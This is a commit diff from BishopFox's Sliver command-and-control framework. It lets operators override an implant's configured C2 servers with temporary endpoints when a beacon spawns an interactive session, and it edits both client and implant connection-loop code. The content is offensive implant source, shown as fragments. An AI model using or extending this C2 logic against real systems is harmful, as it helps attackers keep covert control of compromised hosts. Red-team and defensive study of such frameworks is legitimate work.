Initial support for changing C2 when spawning an interactive session …

…from a beacon. Does not support changing transports.
BishopFox · Apr 7, 2023 · 85f51a8 · 85f51a8
1 parent ec7e76f
commit 85f51a8
Show file tree

Hide file tree

Showing 10 changed files with 25 additions and 16 deletions.
diff --git a/client/command/sessions/interactive.go b/client/command/sessions/interactive.go
@@ -89,7 +89,7 @@ func InteractiveCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 	c2s = append(c2s, tcpPivotC2...)
 
 	// No flags, parse the current beacon's ActiveC2 instead
-	if len(mtlsC2) == 0 && len(wgC2) == 0 && len(httpC2) == 0 && len(dnsC2) == 0 && len(namedPipeC2) == 0 && len(tcpPivotC2) == 0 {
+	if len(c2s) == 0 {
 		con.PrintInfof("Using beacon's active C2 endpoint: %s\n", beacon.ActiveC2)
 		c2url, err := url.Parse(beacon.ActiveC2)
 		if err != nil {

diff --git a/implant/sliver/sliver.go b/implant/sliver/sliver.go
@@ -540,7 +540,7 @@ func openSessionHandler(data []byte) {
 
 	go func() {
 		abort := make(chan struct{})
-		connections := transports.StartConnectionLoop(abort)
+		connections := transports.StartConnectionLoop(abort, openSession.C2S...)
 		defer func() { abort <- struct{}{} }()
 		connectionAttempts := 0
 		for connection := range connections {

diff --git a/implant/sliver/transports/session.go b/implant/sliver/transports/session.go
@@ -80,15 +80,15 @@ type Start func() error
 type Stop func() error
 
 // StartConnectionLoop - Starts the main connection loop
-func StartConnectionLoop(abort <-chan struct{}) <-chan *Connection {
+func StartConnectionLoop(abort <-chan struct{}, temporaryC2 ...string) <-chan *Connection {
 
 	// {{if .Config.Debug}}
 	log.Printf("Starting interactive session connection loop ...")
 	// {{end}}
 
 	nextConnection := make(chan *Connection)
 	innerAbort := make(chan struct{})
-	c2Generator := C2Generator(innerAbort)
+	c2Generator := C2Generator(innerAbort, temporaryC2...)
 
 	go func() {
 		var connection *Connection

diff --git a/implant/sliver/transports/transports.go b/implant/sliver/transports/transports.go
@@ -36,17 +36,26 @@ const (
 )
 
 // C2Generator - Creates a stream of C2 URLs based on a connection strategy
-func C2Generator(abort <-chan struct{}) <-chan *url.URL {
+func C2Generator(abort <-chan struct{}, temporaryC2 ...string) <-chan *url.URL {
 	// {{if .Config.Debug}}
 	log.Printf("Starting c2 url generator ({{.Config.ConnectionStrategy}}) ...")
 	// {{end}}
 
 	c2Servers := []func() string{}
-	// {{range $index, $value := .Config.C2}}
-	c2Servers = append(c2Servers, func() string {
-		return "{{$value}}" // {{$index}}
-	})
-	// {{end}} - range
+	// Any temporary C2 servers that are defined will override what is configured in the implant
+	if len(temporaryC2) > 0 {
+		for _, c2 := range temporaryC2 {
+			c2Servers = append(c2Servers, func() string {
+				return c2
+			})
+		}
+	} else {
+		// {{range $index, $value := .Config.C2}}
+		c2Servers = append(c2Servers, func() string {
+			return "{{$value}}" // {{$index}}
+		})
+		// {{end}} - range
+	}
 
 	generator := make(chan *url.URL)
 	go func() {

diff --git a/protobuf/clientpb/client.pb.go b/protobuf/clientpb/client.pb.go
diff --git a/protobuf/commonpb/common.pb.go b/protobuf/commonpb/common.pb.go
diff --git a/protobuf/dnspb/dns.pb.go b/protobuf/dnspb/dns.pb.go
diff --git a/protobuf/rpcpb/services.pb.go b/protobuf/rpcpb/services.pb.go
diff --git a/protobuf/rpcpb/services_grpc.pb.go b/protobuf/rpcpb/services_grpc.pb.go
diff --git a/protobuf/sliverpb/sliver.pb.go b/protobuf/sliverpb/sliver.pb.go